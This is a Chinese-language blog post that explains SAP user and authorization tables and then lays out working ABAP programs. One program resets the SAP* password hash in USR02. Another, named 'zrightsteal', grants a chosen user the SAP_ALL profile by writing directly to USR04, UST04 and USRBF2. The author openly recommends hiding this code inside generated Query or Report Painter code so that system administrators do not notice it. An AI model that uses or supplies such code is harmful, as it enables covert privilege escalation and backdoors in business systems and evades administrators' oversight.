如何窃取权限

最新推荐文章于 2023-11-22 09:05:08 发布
最新推荐文章于 2023-11-22 09:05:08 发布
阅读量701 收藏
点赞数
文章标签: authorization sap report table query user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/saptopia/article/details/1827876
版权

..............................
如何窃取权限

..............................

用户:
User type用户类型(干啥用的不讲):
通常的用户类型有
a.dialog (就是normal user)
b.communication
c.system
d.service
e.reference.

通常你在使用任何T-code前一定会有权限检测的.
AUTHORITY_CHECK:这个函数只是小检查一下你的user有没有,什么时候过期.
**如果coding只要使用此函数就够了.
AUTHORITY_CHECK_TCODE:检查T-code

这倆函数是真正检查autorization objects的.
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
将SAP*的密码改成123的程序,很简单.
我们找到那个user logon表USR02.
(DF52478E6FF90EEB是经过SAP加密保存在DB的,哪位老兄研究过SAP的密码加密?)
report zmodSAP*.
data zUSR02 like USR02 .
select  single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02  .

 

现在的问题是如何让你那basis不发现,很简单,将code隐藏在Query里面,就是说你做一个
query,query是会产生code的,然后你加入此代码,谁能想到???然后你就等你的basis去哭...

这样做太狠毒了.还是自己偷偷搞自己的用户吧.
在此你必须对权限结构非常清晰.
权限和三个表有关系.
a.USR04
b.USR04
c.USRBF2  这个表是对应到所用的authorzization objects的.
*&---------------------------------------------------------------------*
*& Report        : Steal SAP ALL Right                                 *
*& Creation Date : 2004.04.01                                          *
*& Created by    : Stone.Fu                                            *
*& Description   : 可窃取SAP ALL权限                                    *
*& Modified Date : 2005.11.02
*& Description   : 将此code hide在report painter or query  code        *
*&---------------------------------------------------------------------*

report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS  like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select  single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All 权限
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS  = zPROFS.
Update USR04 from zUSR04  .

**Update User authorization masters table UST04 .
select  single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE  = 'SAP_ALL'. "SAP all 权限
Update UST04 from zUST04 .

*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .

select *  from  USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.

 
saptopia
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于权限组合的Android窃取隐私恶意应用检测方法
01-20
基于权限组合的Android窃取隐私恶意应用检测方法基于权限组合的Android窃取隐私恶意应用检测方法
MySQL之权限管理
12-14
 为了保证数据库中的业务数据不被非授权的用户非法窃取,需要对数据库的访问者进行各种限制,而数据库安全性控制措施主要有这三种,第一种用户身份鉴别,手段可以是口令,磁卡,指纹等技术,只有拥有合法身份的...
SAP权限相关的表及如何使用FM获取用户权限
SAP ABAP开发技能记录分享
11-22 633
AGR_1250 活动组的权限数据(通过权限对象 查 角色)FM:EFG_USER_AUTH_FOR_OBJ_GET 也可以得到指定用户指定权限对象的值。AGR_1253 作业组的权限数据 - 静态对象。使用FM获取用户指定的权限对象的值:SUSR_USER_AUTH_FOR_OBJ_GET。AGR_1251 活动组的权限数据。例:*&*****权限相关。
SAP 用户权限解析
少年休闲海
11-08 5447
通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢? 首先明白几个概念. 1.activity 这样说吧,我们从activity谈起,activity是什么意思这个你查下 字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两, 不对,这是我老
获取权限对象相关函数
森林木的博客
08-06 1312
最近好几个人问获取权限相关的函数。 开始是找了个 根据操作账号,权限对象获取所属权限   CALL FUNCTION 'GET_AUTH_VALUES'     EXPORTING       object1           = iv_auth_obj       user              = iv_uname     TABLES       values            
函数组:SUSE
weixin_33851429的博客
10-24 75
函数组说明:外部使用的功能模块;这个函数组中的函数可以用来处理一些系统功能。 AUTHORITY_CHECK_TCODE(Authorization Check for Start of a Transaction):检查开始事务的权限。输入事务码,返回当前用户是否有事务码的执行权限。AUTH_CHECK_TCODE:作用与上面的事务码类似。OBJECT_EXISTS:检查权限对象是否存在PAS...
SAP 用户权限
ctf63282的博客
01-21 385
用户权限解剖:通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的prifile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?[@more@]首先明白几个概念.1.act...
通过Android任务机制进行权限泄漏和信息窃取
02-25
通过Android任务机制进行权限泄漏和信息窃取
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
#数据库应用提权在权限提升中的意义#WEB 或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:Redis
基于权限组合的Android窃取隐私恶意应用检测方法.pdf
09-21
基于权限组合的Android窃取隐私恶意应用检测方法.pdf
SAP用户权限控制大解析及权限进阶分析
少年休闲海
11-23 2952
通常basis会使用PFCG做权限管理,你保存时会产生一个系统外的profile name,而且,SU01时用户有profile 和role两栏位。   这些个profile name ,profile,role它们的关系如何呢?profile 这个英语词义是很丰富的,在中文中难找对应的表示同等语义的词语。   基本概念    activity   activity,活动,类如insert
【ABAP系列】SAP ABAP常用函数总结第一篇
ARICK2014的博客
07-13 353
公众号:SAP Technical 本文作者:matinal 原文出处:http://www.cnblogs.com/SAPmatinal/ 原文链接:【ABAP系列】SAP ABAP常用函数总结第一篇 前言部分 大家可以关注我的公众号,公众号里的排版更好,阅读更舒适。 正文部分 1:负号前置:CLOI_PUT_SIGN_IN_FRONT 2:加前导零:...
SAP 的用户创建及权限设置
少年休闲海
07-17 6317
通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢? 首先明白几个概念. 1.activity 这样说吧,我们从activity谈起,activity是什么意思这个你查下 字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两, 不对,这是我
获取用户权限列表(RSSB_GET_AUTH_FOR_USER
twomeyla博客
08-13 1072
外部系统有时要用到BW系统内表设置的权限来做管控,目的当然是为了不用一样的信息在多个地方去维护。 之前都是采用直接到后台表去查询,写一个RFC去读,其实系统也有这个RFC:RSSB_GET_AUTH_FOR_USER。         有时觉得SAP做的太绝了,你想到的想不到了,都帮你做到了。
权限相关
wy的专栏
07-27 209
AUTHORITY
致命SAP权限控制漏洞
myliulongtao的专栏
10-07 2495
尽管SAP系统提供了非常完善的权限控制机制,甚至允许细到字段级和允许用户自定义授权对象,然后SAP权限控制漏洞也是致命的,随便一个小程序就可轻易获取权限作为职业程序员,对取得权限大多会有一定兴趣(这点催生了一批无聊的所谓Hacker).读者可自行理解下面几个概,在此不再细述.[1].Activity(group)[2].Authorization Object[3].Profi
获取用户的授权值
huling_1997的博客
11-20 415
REPORT  z_barry_test. DATA: it_values TYPE TABLE OF usvalues WITH HEADER LINE. CALL FUNCTION 'SUSR_USER_AUTH_FOR_OBJ_GET'   EXPORTING     user_name           = 'TZ_SD002' *    sel_object     
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
设置usb权限 工具
11-30
此外,USB权限工具还可以帮助企业和组织管理员工或用户对USB设备的访问权限,以保护敏感数据和信息不被泄漏或盗取。通过设置USB权限工具,管理员可以限制特定用户或用户组对USB设备的访问,或者对特定USB设备的使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值